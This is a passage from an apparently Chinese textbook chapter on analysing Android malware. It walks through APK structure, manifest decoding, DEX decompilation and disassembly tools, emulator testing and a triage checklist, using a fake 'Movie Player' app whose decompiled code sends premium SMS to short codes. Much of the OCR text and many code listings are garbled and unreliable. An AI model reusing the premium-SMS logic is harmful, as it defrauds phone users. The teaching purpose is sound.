支持 的 其 他 任何 认证 算法 (如 DSA 或 EC)。 

+ CERT.SF 包含 MANIFEST.ME 文 件 列表 条 目 及 对 应 的 哈 希 值 。 
CERT.SF 随 后 被 签名 。 可 使 用 传递 关系 验证 MANIFEST.MF 中 的 所 有 条 
目 。 以 下 命令 可 用 于 检查 清单 文件 中 的 条 目 : 


jJarsigner -verbose -verify -certs apk name.apk 


4 MANIFEST.MF 包含 所 有 应 被 签名 的 文件 的 名 称 列 表 及 对 应 文件 内 
容 的 哈 希 值 。 访 文件 中 每 个 条 目的 哈 硕 值 都 应 该 存放 在 CERT.SF 中 ， 用 
来 确定 APKE 中 文件 的 有 效 性 。 
e classes.dex Dalvikn] $447 (DEX) LF 8175 n] ££ Android ERE A Zt IJ Dalvik kz 
拟 机 中 执行 的 程序 字 节 代码 。 
e res 该 文件 夹 包含 了 原始 或 编译 过 的 资源 文件 ， 如 图 像 、 布 局 、 字 人 符 串 等 。 
e resources.arse ”该 文件 夹 仪 包含 说 如 XML 文 件 的 预 编译 资源 。 


18.1.2 MARRS 


Android 应 用 程序 清单 文件 AndroidManifsstxml 位 于 每 个 Android 应 用 程序 的 根 
目录 中 。 该 文件 包含 应 用 及 其 组 件 的 相关 基本 信息 、 所 需 的 权限 、 使 用 的 库 和 Java 
包 等 。AndroidManifestxml 以 二 进 制 XML 格式 存储 在 APK 中 ， 所 以 必须 先 转 换 为 文 
本 形式 后 才能 进行 分 析 。 很 多 可 用 工具 均 可 进行 此 类 转换 ， 本 节 将 使 用 apktool 一 一 人 它 
是 一 组 工具 和 库 ， 可 用 于 解码 清单 和 资源 文件 、 将 DEX 反 编译 为 smali 文 件 格式 等 。 
要 解码 APK， 可 使 用 d 选 项 来 运行 apktool， 如 下 所 示 : 


apktool d demo.apk demo apk 

: Baksmaling... 

: Loading resource table... 

: Loaded. 

: Loading resource table from file: /home/demo/apktool/framework/1.apk 
: Loaded. 

: Decoding file-resources... 

: Decoding values*/* XMLs... 

: Done. 


= ÍHHíHHHHHHH ^t 


: Copying assets and libs... 


(E FA apktoolFe A ARS HH CTE, TH ACTES n] CE FE OC AI Za 48 EE FT ST 
. BEA FXe— "T AndroidManifest.xml X: fF f9l : 


Wt 


$ cat demo apk/AndroidManifest.xml 
<?xml version-"1.0" encoding-"utf-8"?» 
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Q <manifest package-"org.me.androidapplicationl" 


xmlns:android-"http://schemas.android.com/apk/res/android"» 


O «application android:icon="@drawable/icon"> 
G«activity android:label="Movie Player" 
@android:name=".MoviePlayer"> 
@<intent-filter> 
Q«action android:name-"android.intent.action.MAIN" /> 
@<category android:name- 
"android.intent.category.LAUNCHER" /» 
«/intent-filter» 
«/activity» 
«/application» 
@<uses-permission android:name-"android.permission.SEND SMS" /> 


</manifest> 


= et Androids AK PFET EP TIN, REE RA CPP) Bl) ee Ee 


manifest 元 系 @ 定 义 package 特 性 ，package 特 性 是 应 用 程序 的 Java 包 名 。 包 名 
被 用 作 唯 一 标识 待 ， 类 似 于 Java 包 命名 方案 。 包 名 表示 包 层 次 结构 ， 与 域名 
类 似 ， 但 方向 相反 。 顶 级 域 (TLD) 位 于 最 左 侧 ， 由 @ 处 可 见 ， 此 时 域 的 名 称 
是 反 过 来 的 ， 翻 转 后 即 为 androidapplication1.me.org。 
application 元 系 四 包含 应 用 程序 的 声明 ， 其 子 元 背 声明 了 应 用 程序 中 对 应 的 
各 个 组 件 ， 如 icon、permission 和 和 process 等 。 
activity 元 素食 定义 应 用 与 用 户 交 互 的 可 视 化 界面 。android:label 特 性 对 应 的 
“Movie Player” (ERJEN EEX J activity t RALE, = 
给 用 户 的 字符 串 ( 如 显示 给 用 户 的 界面 )。 另 一 个 重要 特性 是 android:name@， 
它 定义 了 实现 该 activity 元 素 的 类 的 名 字 。 
intent-filter/U3& 8 . action;G3& Q Ul / category7U ROHA J intent; intent 是 一 
SSB PEERS. RTT UA IO TS Ee ZA PORE. actioni 
用 以 下 动作 名 定义 了 应 用 程序 主 入 口 : android.intent.action. MAIN. category 
76 3& X] intent 1T FE, JEJE Y 4E android.intent.category.LAUNCHER 7X 
定 应 用 程序 如 何 显示 在 程序 列表 中 。 单个 activity 元 素 全 可 能 含有 一 个 或 多 个 
描述 其 功能 的 intent-filter。 
uses-permission 元 系 @ 与 俘 找 可 疑 的 应 用 程序 相关 。 可 以 使 用 一 个 或 多 个 
uses-permission 元 取 定 义 应 用 程序 正常 运行 需要 的 所有 权限 。 安 装 了 应 用 并 
授予 这 些 权 限 后 ， 就 可 随心 所 欲 地 使 用 它们 了 。android:name 特 性 定义 了 应 
用 程序 需要 的 特定 权限 。 在 本 例 中 , 目 称 电影 播放 句 的 应 用 程序 申请 了 允许 
给 任意 号 码 发 送 所 需 短 信 的 android.permission.SEND _ SMS 权限, 这 显然 会 引 
起 对 应 用 程序 合法 性 的 怀疑 ， 并 需要 进一步 对 其 进行 调 三 。 
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Sd 注意 : 这 个 例子 只 包含 了 部 分 可 能 的 清单 元 素 及 特性 。 分 析 复杂 的 清单 文 


\S 。 件 时 ， 可 查阅 Android 开 发 者 文档 来 充分 了 解 不 同 的 元 素 和 特性 ， 


18.1.3 分 析 DEX 


Dalvik n] HÁT ROEN 81/5 n] £E Android Dalv 这 虚拟 机 中 执行 的 字 节 码 。DEX 
字 节 码 与 构成 Java 类 的 字 节 但 密切 关联 。 二 者 在 反 汇 编 层 面 的 指令 极为 类 似 ， 那 些 
AB JavaiH HJ] A A T6 SR UN A S] IRI n] EA WDalviks DalvikAilJavaTE KILE m 
的 一 个 明显 区 别 是 : 前 者 主要 使 用 的 是 寄存 器 而 不 是 堆栈 。Dalvik 虚 拟 机 采用 基于 
窗 和 存 胡 的 染 构 ,而 Java 则 采用 基于 堆栈 的 染 构 。Dalv 隶 虚拟 机 指令 操作 的 古 32 位 寄存 
器 ， 这 也 就 意味 着 由 寄存 器 提供 指令 操作 所 需 的 数据 。 每 个 方法 都 必须 明确 规定 所 
使 用 的 寄存 占 数 量 , 该 数量 应 包括 被 分 配 用 于 传递 实 参 和 返回 值 的 寄存 左 。 而 在 Java 
虚拟 机 中 ， 指 令 从 堆栈 中 提取 操作 数 ， 随 后 将 结果 压 回 堆栈 。 为 说 明 这 种 差异 ， 以 
下 是 IDA 中 一 段 函 数 开 头 处 的 Dalv 冰 肥 汇 编 代 码 ; 

CODE:0002E294 # Method 3027 (0xbd3) 

CODE :0002E294 @. short 0xa # Number of registers : Oxa 


CODE: 0002E296 Q.short 3 # Size of input args (in words) : 0x3 
CODE:0002E298 &). short 5 4 Size of output args (in words) : 0x5 


CODE:0002E2A4 # Source file: SMSReceiver.java 
CODE:0002E2A4 public void 
com.google.beasefirst.SMSReceiver.onReceive( 


CODE :0002E2A6 invoke-virtual {intent}, «ref Intent.getAction( 
imp. @ def Intent getAction@L> 
CODE :0002E2AC move-result-object Ov2 
CODE : 0002E2AE const-string Qv, aAndroid provid 
t "android.provider.Telephony.SMS RECEIVED" 
CODE:0002E2B2 invoke-virtual Q:v2, v3), «boolean 


String.equals (ref) 
imp. @ def String equals@ZL> 


CODE:0002E2B8 move-result Q2 
CODE :0002E2BA if-eqz Qv2, locret 


标签 @@、 思 和 利 处 的 程序 代码 是 函数 定义 的 一 部 分 ， 用 来 表明 此 函数 使 用 的 寄 
存 器 数量 及 其 在 输入 参数 和 输出 返回 值 之 间 的 分 配 。@、@、@、@ 和 @ 标 签 处 的 
程序 代码 使 用 了 v2 和 v3 这 两 个 寄存 器 。Dalv 六 中 的 寄存 器 使 用 字符 前 缀 v， 后 面 紧 接 
独 的 是 寄存 项 编号 。 前 组 v 用 来 表示 这 些 寄存 器 是 不 同 于 物理 便 件 中 的 CPU 寄存 人 右 的 
“虚拟 ”寄存 器 。 以 下 是 使 用 Java 字 节 码 的 同一 函数 的 反 汇 编 代 码 : 


; Segment type: Pure code 
-method public 


) 


389 


BV aR rere ATE AT 


onReceive (Landroid/content/Context; Landroid/content/Intent;)\V 
.limit stack 5 
.limit locals 4 
@aload 2 ; met003 slot002 
invokevirtual 
android/content/Intent.getAction()Ljava/lang/String; 
@ldc "android.provider.Telephony.SMS RECEIVED" 
invokevirtual java/lang/String.equals (Ljava/lang/Object;)Z 
ifeq met003 393 
new com/google/beasefirst/NetUtil 
Gaup 
invokespecial com/google/beasefirst/NetUtil.<init>()V 
@aload 1 ; met003 slot001 
Qiac "com.google.beasefirst" 


如 你 所 见 ， 其 中 没有 引用 任何 寄存 器 ; 相反， 所 有 操作 都 在 堆栈 上 进行 。 涉 及 
堆栈 操作 的 指令 在 标签 @、@、@、@ 和 @ 处 。 例如，dup 指 令 @ 将 复制 栈 顶 的 数据 ， 

因为 DEX 与 Java 类 文件 关联 ， 所 以 可 实现 格式 互 换 。 由 于 Java 语 言 具 有 较 长 的 
历史 , 已 经 开发 出 很 多 用 于 分 析 、 反 沪 编 尤其 是 反 编译 的 工具 , 因此 知道 如 何 将 DEX 
转换 为 JAR 文 件 会 很 有 用 。dex2jar 项 目 是 一 些 针 对 DEX 文 件 的 程序 集合 ， 其 中 最 值 
得 关注 的 是 dex2jar 程 序 ， 它 可 将 DEX 文 件 转换 为 Java 字 节 人 码 。 下 面 展 示 了 如 何 运 行 
dex2jar 命 令 来 将 DEX 转 换 为 JAR 文 件 ， 这 与 之 前 通过 IDA 比 较 两 种 反 汇 编 的 输出 相 
类 似 : 


$ ~/android/dex2jar-0.0.9.15/d2j-dex2jar.sh -v classes.dex 
dex2jar classes.dex -> classes-dex2jar.jar 
Processing Lorg/me/androidapplicationl/MoviePlayer; 
Processing Lorg/me/androidapplicationl/R$layout; 
Processing Lorg/me/androidapplicationl/R; 
Processing Lorg/me/androidapplicationl/R$string; 
Processing Lorg/me/androidapplicationl/HelloWorld; 
Processing Lorg/me/androidapplication1l/RSattr; 
Processing Lorg/me/androidapplicationl/DataHelper$OpenHelper; 
Processing Lorg/me/androidapplicationl/DataHelper; 
Processing Lorg/me/androidapplicationl/R$drawable; 
$ file classes-dex2jar.jar 
classes-dex2jar.jar: Zip archive data, at least v2.0 to extract 
$ unzip classes-dex2jar.jar -d java classes 
Archive: classes-dex2jar.jar 
creating: java classes/org/ 
creating: java classes/org/me/ 
creating: java classes/org/me/androidapplicationl/ 
inflating: 
java classes/org/me/androidapplicationl/MoviePlayer.class 
inflating: 
java classes/org/me/androidapplication1/R$layout.class 
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inflating: java classes/org/me/androidapplicationl/R.class 
inflating: 

java classes/org/me/androidapplicationl/R$string.class 
inflating: 

java classes/org/me/androidapplicationl/HelloWorld.class 
inflating: java classes/org/me/androidapplicationl/R$attr.class 
inflating: 

java classes/org/me/androidapplication1l/DataHelper$OpenHelper.class 
inflating: 

java classes/org/me/androidapplicationl/DataHelper.class 
inflating: 

java classes/org/me/androidapplicationl/R$drawable.class 


18.1.4 Java 反 编译 


大 多 数 人 部 会 觉得 阅读 Java 这 类 局 级 语言 的 代 公 要 远 比 阅读 Java 虚 拟 机 反 汇 编 
代码 容易 得 多 。 由 于 Java 虚 拟 机 并 不 复杂 ， 因 此 反 编 译 是 可 行 的 ， 可 以 从 类 文件 中 
恢复 出 Java 源 代码 。dex2jar 将 所 有 Java 尺 编译 工具 引入 了 Android 世 界 ， 从 而 可 以 很 
容易 地 对 用 Java 编 写 的 Android 应 用 程序 进行 反 编译 。 

VF Java lke gai ae AT A ER aR, (ARS OWA AE. ID 
decompiler n] fe Æ RMT HJ AAR Javakesm ites o EXCEPT EY 
GUI 应 用 程序 浏览 源 代码 : JD-GUI, JD Eclipse 和 JD-ImtelliJ。JD-GUI 是 一 个 定制 的 
图 形 用 户 界 和 面 ， 可 用 于 快速 分 析 源 代码 而 个 必 安 法 大 型 Java 编 辑 咒 ， 它 在 Windows、 
macOS 和 Linux 操 作 系 统 上 均 可 以 使 用 。 

要 反 编 译 DEX 文 件 ， 首 先 需要 使 用 dex2jar 将 其 转换 成 JAR 文 件 ， 然 后 用 JD-GUI 
打开 它 。 下 面 展示 了 如 何 使 用 dex2jar: 

$ ~/android/dex2jar-0.0.9.15/d2j-dex2jar.sh classes.dex 

dex2jar classes.dex -> classes-dex2jar.jar 

要 在 JD-GUI 中 但 看 源 代 人 码 ， 可 打开 文件 classes-dex2jarjar。 图 18-1 展 示 了 在 
JD-GUI 中 反 编译 出 来 的 Java 源 代码 。 可 使 用 File | Save All Sources 选 项 从 JD-GUI 中 导 
出 所 有 经 过 反 编 译 的 类 文件 。 

on PEAS ETE PAS aa: 其 中 一 个 问题 是 ， 它 对 字 贡 人 码 的 修改 非 钊 敏感， 这 样 
会 阻止 恢复 任何 合乎 情理 的 源 代码 ， 男 一 个 问题 是 ， 它 不 支持 反 沪 编 代 公 的 并 排比 
较 功 能 ， 而 错误 的 反 编译 会 导致 输出 结果 中 某 些 功能 的 缺失 。 在 处 理 恶 意 代 码 时 ， 
反 编 译 费 轧 是 建议 反复 确认 任何 可 疑 的 代 人 码 以 及 可 能 被 反 编译 右 隐 藏 的 功能 。 当 
JD-GUI 无 法 确定 反 编 译 代码 时 ， 它 会 输出 类 文件 的 反 汇 编 代 人 码 。 以 下 就 是 JD-GUI 
对 无 法 完成 扩编 详 的 函数 的 输出 : 


/* Error */ 


private String DownloadText (String paramString) 
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// Byte code: 

// 0: aload 0 

// 1: aload 1 

// 2: invokespecial 63 
com/example/smsmessaging/TestService:OpenHttpConnection 
(Ljava/lang/String;)Ljava/io/InputStream; 

// 5: astore 3 


E Java Decompiler - MoviePlayer.class 
File Edit Navigate Search Help 
eisslos 


 classesdex2jarjar x 
| *" HB org.me.androidapplication1  MoviePlayer.class xj Fa 


b [D] DataHelper -- - 
b 国 HelloWorld SmsManager localSmsManager; 
: if (localDataHelper.canwe()) 
1 
TextView localTextView = new TextView(this); 
localTextView.setText("IlopomnMTe, 3anpauWBaerCR mnocryn K BM 
setContentView(LocalTextView) ; 
localSmsManager = SmsManager.getDefault(); 
} 
try 


localsmsManager.sendTextMessage("3353", null, "798657", nul 


catch (Exception localException2) 
1 
try 


localSmsManager.sendTextMessage("3354", null, "798657", n 
catch (Exception localException2) 
1 
try 
while (true) 


i 
localSmsManager.sendTextMessage("3353", null, "798657 
localDataHelper.was(); 


图 18-1 ”使 用 J]D-GUI 反 编译 的 Java 源 代码 


18.1.5 ”DEX 反 编 译 


前 面 讨论 的 DEX 反 编译 过 程 存在 的 问题 是 : 文件 必须 自 先 转换 成 JAR 格 式 ， 然 
后 使 用 Java 工 具 进 行 反 编 详 。 于 是 同时 在 两 个 地 方 存 在 失败 的 可 能 : DEX 转 换 和 JAR 
反 编 译 。JEB 反 编译 器 旨 在 通过 直接 在 DEX 文 件 上 进行 反 编 译 来 解决 这 一 问题 。 它 
有 凑 似 于 IDA 的 非 营 容易 使 用 的 图 形 用 户 界 面 ， 这 使 其 具有 令 人 满意 的 用 户 体 验 。 
与 人 D 反 编译 右 不 同 ， 正 B 是 一 于 商业 产品 ， 单 个 许可 需要 1080 美 元 。 它 能 提供 的 功 
能 如 下 : 

e Hiz/xmvEDalvik £ nh. 

e 交互 式 分 析 疼 形 用 户 界 面 , 可 检查 交叉 引用 以 及 重 命 名 方法 、 字 段 、 类 和 包 。 

e 浏览 整个 APK， 包 括 清 单 文件 、 资 源 、 证 书 和 字符 串 等 。 

e 文 持 将 分 析 期 间 的 修改 保存 到 磁盘 ， 并 可 共享 文件 以 进行 协作 分 析 。 
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e 支持 Windows、Linux 和 macOS 系 统 。 
图 18-2 显 示 了 如 何 使 用 JEB 进 行 DEX 反 编译 ， 之 前 曾 用 JD-GUI 对 同一 DEX 文 件 
生成 反 编 译 的 Java 代 码 。 


File Edit Action Window Help 


wi fb Cv 4rPOoOxN cx. 


Assembly 器 (Decompiled Java % \ Strings |Constants |Notes | č  ć < 


" org.me. androidapplic 


DataHelper public static void OFLog(String tag, String msg) ( 
HelloWorld Log.d(tag, msg); 

) 
R 


public void onCreate(Bundle icicle) ( 
String v11 - "Oops in playsound"; 
String v18 z ""; 
super.onCreate(icicle); 
DataHelper v6 = new DataHelper(((Context)this)); 
if(v6.canwe()) ( 
TextView v8 = new TextView(((Context)this)); 
v9.setlext("lonownunwre, asanpauWHBaeTCH AnocTryn K BMHeoTekKe.." 
this.setContentView(((View)v9)); 
SmsManager v8 = SmsManager.getDefault(); 
String vi = "3353": 
string v3 = "798657"; 
string v2 = null, 
PendingIntent v4 = null; 
PendingIntent v5 - null; 
try { 
v8.sendTextMessage(vi, v2, v3, v4, v5); 


catch(Exception v7) ( 

Log.e(vi1, w10, ((Throwable)v?)); 
 ——— | } 
D 月 
|_| Show inner classes 
Decompiling method Lorg/me/androidapplicationi/MoviePlayer ; -><init>() 
Decompiling method Lorg/me/androidapplicationi/MoviePlayer ; ->OFLog(Ljava/lang/String;Ljava/lar 
Decompiling method Lorg/me/androidapplicationi/MoviePlayer ; ->onCreate(Landroid/os/Bundle; )V 


12:0 | Lorg/me/androidapplication1/MoviePlayer;-»«init»()V | FFFFFFFE 


图 18-2 ”使 用 JEB 进 行 DEX 反 编译 


轧 之 ，JEB 是 唯一 回 逆 回 工 程 提供 直接 分 析 DEX 文 件 功能 的 商业 软件 。 其 外 观 
和 使 用 体验 都 类 似 于 IDA， 因 而 肯定 会 吸引 那些 熟悉 IDA 的 用 户 。 

男 一 个 原生 的 DEX 有 反 编译 费 是 DAD， 它 是 开源 Androguard 项 目的 一 部 分 。 该 项 
目 包 含 分 析 Android 应 用 程序 所 需 的 一 切 ， 以 及 用 于 恶意 软件 分 析 的 许多 有 趣 的 脚 
本 。 人 简单 地 调用 androdd.py 肢 本 即 可 使 用 DAD 反 编译 费 ， 如 下 所 示 : 

$ ~/android/androguard/androdd.py -i demo.apk -o dad java 

Te ee ae dass 


Create directory dad Java 
Analysis ... End 
Decompilation ... End 


Dump Lorg/me/androidapplicationl/RS$drawable; 
OFLog (Ljava/lang/String; Ljava/lang/String;)V ... bytecodes ... 


DAD 没 有 提供 用 来 阅读 反 编 译 代 码 的 GUI， 但 任何 文本 编辑 器 或 Java 编 辑 器 (如 
ItelliJ 或 NetBeans) 都 可 以 更 好 地 分 析 源 代码 。 反 编译 后 的 代 但 保存 在 指定 目录 
dad java 中 , 可 使 用 任何 文本 编辑 器 打开 。 下面 显示 了 反 编 详 生 成 的 MoviePlayerjava 
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FE NIB: 
$ cat dad java/org/me/androidapplicationl/MoviePlayer.java 


android.telephony.SmsManager vO = 
android.telephony.SmsManager.getDefault(); 


try { 
vO0.sendTextMessage("3353", 0, "798657"; 0, 0); 
try { 


v0 .sendTextMessage ("3354Ă", 0, "798057", 0, 0); 
} catch (Exception v7) { 
android.util.Log.e("Oops in playsound", "", v7); 


} 


18.1.6 ”DEX 反 汇编 


当 其 他 一 切 痢 归于 失败 时 ， 反 沪 编 占 站 能 工作 。 阅 读 反 沪 编 右 的 输出 可 能 并 无 
太 多 趣味 可 言 ， 但 这 却 是 必需 的 技能 。 在 分 析 复杂 或 经 过 混 清 的 恶意 软件 时 ， 反 汇 
编 是 了 解 其 功能 和 设计 反 混 消 方案 的 唯一 可 靠 方法 。 

baksmali 和 smali 分 别 是 Dalv 冰 字 蔬 码 的 反 汇 编 和 汇编 程序 。 语 法 基本 上 基于 
Jasmin/Dedexer， 文 持 DEX 格 式 的 全 部 功能 (注释 、 调 试 信息 、 行 信息 等 )。 

汇编 功能 是 一 种 很 有 趣 的 “福利 ” 因为 不 需要 修补 和 改动 字 节 码 ,， 即 可 在 汇编 
层面 实现 代码 的 修改 和 转换 。 使 用 baksmali 反 汇编 DEX 文 件 所 得 的 代码 语法 非常 直 
观 ， 如 下 所 示 : 

$ java -jar -/android/smali/baksmali-2.0.3.jar -o disassembled 


classes.dex 
$ find ./disassembled/ 


./disassembled/org/me/androidapplicationl/R$drawable.smali 
./disassembled/org/me/androidapplicationl/RS$attr.smali 
./disassembled/org/me/androidapplicationl/DataHelperS$OpenHelper.smali 
./disassembled/org/me/androidapplicationl/MoviePlayer.smali 


从 baksmali 命 令 的 上 述 结果 可 以 看 出 , 输出 的 文件 以 对 应 的 Java 类 的 名 称 来 命名 
并 具有 .smali 文 件 扩展 名 。 可 使 用 任何 文本 编辑 偶 来 检查 smali 文 件 。 以 下 是 来 目 
movieplayer.smali HJ RIB Fr Ex: 

.class public Lorg/me/androidapplicationl/MoviePlayer; 


.super Landroid/app/Activity; 
.Source "MoviePlayer.java" 


.line 34 


invoke-virtual {p0, v9}, Lorg/me/androidapplicationl/MoviePlayer 


394 


第 18 章 ”剖析 移动 平台 恶意 软件 


; C setContentView (Landroid/view/View;)V 
.line 35 
invoke-static {}, Landroid/telephony/SmsManager 
;-»getDefault () Landroid/telephony/SmsManager; 
move-result-object v0 
.line 54 
.local v0, "m":Landroid/telephony/SmsManager; 
DCoHSE-SErimg wl, "3331" 
.line 55 
.local vi, "destination":Ljava/lang/String; 
const-string v3, "798657" 


为 便于 哆 谈 smali 文件 ， 编 辑 顺 (如 VIM、Sublime 和 Notepad+H) 都 文 持 语法 高 亮 
显示 功能 : 各 关 编 辑 弗 插 件 的 链接 可 参见 本 音 的 “ 坟 展 阅读 ”。 

另 一 种 从 APK 直 接生 成 baksmali 反 汇编 代码 的 方法 是 使 用 apktool。 它 是 一 个 简 
单 易 用 的 解码 器 ， 可 以 解码 包括 Android 清 单 文件 和 资源 文件 在 内 的 所 有 二 进 制 
XML 文件， 并 且 可 以 使 用 baksmali 对 DEX 文 件 进行 反 汇 编 。 仅 需要 运行 apktool， 吏 
可 以 分 解 APK 文 件 并 做 好 进一步 检查 的 准备 ， 如 下 所 示 : 

$ apktool -q d demo.apk demo apktool 

$ find ./demo apktool 

./demo apktool 


./demo apktool/apktool.yml 
./demo apktool/AndroidManifest. xml 


./demo apktool/res/values/strings.xml 


./demo apktool/smali/org/me/androidapplicationl/R$attr.smali 
./demo apktool/smali/org/me/androidapplication1/MoviePlayer.smali 


18.1.7 示例 18-1: 在 模拟 器 中 运行 APK 


: 本 练习 之 所 以 作为 示例 而 非 实验 提出 ， 是 因为 本 练习 需要 使 用 恶意 


分 析 应 用 时 ， 检 枉 它 们 在 手机 上 运行 时 的 状态 、 行 为 以 及 所 实现 的 功能 是 非 弟 
重要 的 。 在 Android 系 统 上 运行 不 受信 任 的 应 用 程序 的 一 种 安全 方式 就 是 使 用 模拟 
a> Android SDK 包 括 模拟 费 以 及 能 在 很 多 不 同类 型 和 尺寸 的 设备 上 运行 的 各 种 系 
paaga 虚拟 机 使 用 Android 虚 拟 设备 (Android Virtual Device, AVD)E FE as ET E E 

VD 省 理 右 可 用 于 创建 和 配置 虚拟 设备 的 各 种 选项 及 设置 。 可 使 用 bhava 为 参数 的 
android 命 令 来 启动 AVD 管 理 器 的 图 形 用 户 界 面 : 


$ ~/android/adt-bundle-linux-x86 64-20140321/sdk/tools/android avd 
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局 动 AVD 管 理 器 后 ， 单 击 右 侧 菜 单 中 的 “New”( 新 建 ) 按 钮 可 创建 新 设备 ， 如 
图 18-3 所 示 。 


图 18-3 ”创建 新 的 AVD 配 置 
接 下 来 运行 以 下 命令 来 局 动 之 前 创建 的 AVD: 


$ ~/android/adt-bundle-linux-x86 64-20140321/sdk/tools/android list avd 
Available Android Virtual Devices: 
Name: Demo AVD 
Device: Nexus 4 (Google) 
Path: /home/demo/.android/avd/Demo AVD.avd 
Target: Android 4.3 (API level 18) 
Tag/ABI: default/armeabi-v7a 
Skin: 768x1280 
Sdcard: 1024M 


$ -/android/adt-bundle-linux-x86 64-20140321/sdk/tools/emulator 
-avd Demo AVD 


FY fs Hadom A CE Ab T 35 1T AS ERA di FRA PKK IF EL, AN POOP: 


$ 4«/android/adt-bundle-linux-x86 64-20140321/sdk/platform-tools/adb \ 
install demo.apk 

* daemon not running. starting it now on port 5037 * 

* daemon started successfully * 

238 KB/s (13702 bytes in 0.0553) 
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pkg: /data/local/tmp/demo.apk 
ouccess 
安装 完毕 后 ， 可 在 模拟 需 中 运行 的 设备 上 ， 从 应 用 程序 列表 中 找到 该 应 用 程 
序 。 图 18-4 显 示 了 应 用 程序 列表 和 其 中 已 安装 的 Movie Player。 已 安装 的 应 用 程序 、 
应 用 程序 的 权限 和 内 存 使 用 等 信息 ， 以 及 其 他 细节 可 通过 Settings | Apps | 
org.me.androidapplicationl FAY “application” (V HIFEHP)SIEFE EUER. 


5554:Demo AVD = + M 


o M No 


Browser Calculator Calendar Camera 


RERO 


Custom Dev Settings Dev Tools Downloads 
Locale 


prie Messaging Movie Player 


People Settings E redi 
ecorder 


图 18-4 已 安装 应 用 程序 的 列表 


动态 分 析 是 一 种 非常 重要 的 赣 回 工程 技术 。 通 过 运行 并 观察 应 用 程序 运行 时 的 
行为 ， 可 提供 关于 程序 功能 和 淤 在 恶意 活动 相关 的 重要 线索 。Android 模 拟 喜 目 认 的 
各 种 系统 碑 本 可 用 于 测试 漏洞 和 评估 恶意 软件 对 整个 Android 生 态 系统 造成 的 影 啊 。 


18.1.8 ”恶意 软件 分 析 


本 市 将 简单 描述 Android 恶 意 软 件 的 分 析 流 程 , 并 介绍 所 需 的 各 种 工具 。Android 
上 的 他 同 工 程 和 恶意 软件 分 析 亲 和 人 循 与 Windows、Linux 或 macOS 同 样 的 原理 和 技术 。 

看 恶意 软件 样本 时 ， 仍 有 一 些 Android 架 构 特 定 的 细节 能 提供 重要 的 线索 。 

恶意 软件 分 析 通 和 常 包括 两 类 不 同 的 任务 : 

e 确定 样本 是 否 带 有 恶意 。 
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e 确定 桩 本 的 恶意 功能 。 
通 币 ， 确 定 样本 是否 具有 恶意 (或 可 疑 ) 归 比 判定 其 恶意 功能 简单 得 多 。 可 使 用 
以 下 检查 列表 来 解答 这 个 关于 恶意 的 问题 : 


IE 
i 


亚 意 软件 分 析 入 | 


它 是 很 多 人 使 用 的 或 安装 在 大 量 设备 中 的 主流 应 用 吗 ? 该 应 用 普及 得 越 广 ， 

存在 恶意 有 的 可 能 性 就 越 小 。 当 然 ， RFR RAINS BA EL 

分 , 但 风险 通常 较 低 ， 因 为 庞大 的 用 户 群 意味 看 应 用 中 的 缺陷 和 问题 会 更 容 

易 暴 露出 来 。 因 此 ， 知 某 应 用 存在 许多 用 户 投诉 ， 就 值得 进行 深入 调查 。 

该 应 用 是 否 在 Google Play 中 存在 了 很 长 时 间 且 没有 不 恨 记 录 ? 这 项 检查 和 

上 和 面 第 一 项 检查 相关 ， 可 用 来 加 强 决 策 。 长 期 流行 且 无 个 民 记 录 的 应 用 不 太 

可 能 会 故意 友 布 恶意 代码 来 损害 目 己 的 声 和 党 。 

该 应 用 的 作者 已 发 表 的 其 他 应 用 程序 是 否 具 有 民 好 的 评级 ? 

该 应 用 是 否 请 求 敏感 权限 ?在 Android 世 界 中 ， 应 用 可 能 引入 的 风险 与 赋予 

它们 的 权限 成 正比 。 应 讶 慎 对 待 如 下 敏感 权限 的 授予 ,在 请 求 多 个 权限 时 尤 

其 如 此 。 

* 电话 READ PHONE STATE, CALL PHONE, READ CALL LOG, WRITE - 
CALL LOG, ADD VOICEMAIL, USE SIP, PROCESS OUTGOING CALLS 

。 日历 READ CALENDAR, WRITE CALENDAR 

* 联系 人 READ CONTACTS, WRITE CONTACTS, GET ACCOUNTS 

* 麦克 风 RECORD AUDIO 

* 位 置 ACCESS COARSE LOCATION, ACCESS FINE LOCATION 

。 短信 (SMS) SEND SMS, READ SMS, RECEIVE SMS, RECEIVE WAP- 
PUSH, RECEIVE MMS 

* 存储 READ EXTERNAL STORAGE, WRITE EXTERNAL STORAGE 

ZWHAEAAWRARS SECA ALAR? 众所周知 , 恶意 软件 的 

作者 会 利用 分 析 软 件 的 各 种 漏洞 和 弱点 来 扰乱 分 析 过 程 。 一 些 商 业 应 用 程序 

也 会 采用 各 种 混 消 技术 来 防止 被 破解 和 盗版 , 但 这 在 免费 或 窗 单 的 应 用 中 并 

Avis He 

该 应 用 是 否 会 访问 任何 可 疑 域名 ? 恶意 软件 的 作者 喜欢 复 用 域名 , 因此 在 不 

同 的 恶意 软件 样本 中 经 常 能 找到 同一 恶意 域名 。 

在 字符 串 表 中 是 否 存 在 任何 可 疑 的 字符 串 ? 类 似 于 针对 Windows 可 执行 文 

件 的 恶意 软件 分 析 ， 检 查 程 序 的 字符 串 列 表 能 提供 有 天 恶意 应 用 的 线索 。 


下 面 以 一 个 Android 应 用 程序 为 例 ， 答 试 确定 其 是 售 存 在 任何 恶意 行为 。 由 于 该 


应 用 程序 并 非 来 目 Google Play 商店 ， 所 以 之 前 列举 的 前 三 项 检查 均 可 跳 过 ， 而 直接 
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从 bes 用 是 耕 请 求 敏感 权限 ? ”这 个 问题 开始 分 析 。 

这 个 问题 的 答 案 就 在 AndroidManifestxml 中 。， 前 面 已 经 讨论 过 如 何 转换 清单 文 
件 并 读 取 其 内 容 ， 这 里 可 使 用 一 些 简单 易 用 的 Androguard 脚 本 来 加 速 这 个 过 程 。 
Androperm 和 是 一 个 仅 用 于 和 输出 APK 相 关 权 限 请 求 的 向 单 脚本 。 访 脚本 输出 的 示例 
如 下 : 


$ 1 /tmp/apk/*.apk 

-rw-rw-r-- 1 demo demo 14K Apr 24 08:05 /tmp/apk/demo.apk 

$ md5sum /tmp/apk/demo.apk 

964d084898a5547d4644aa7a9f2b8c0d /tmp/apk/demo.apk 

$ ~/android/androguard/androperm.py -d /tmp/apk 
/tmp/apk/demo.apk[1908342623]: ['android.permission.SEND SMS'] 


SEND_SMS 绝 对 是 一 个 可 疑 的 权限 申请 。 它 通常 与 高 价 短信 诈骗 相关 联 ， 可 导 
致 受 感染 的 用 户 遭 受 经 济 损失 。 接 下 来 可 使 用 androapkinfo 脚 本 获取 包含 各 种 相关 悉 
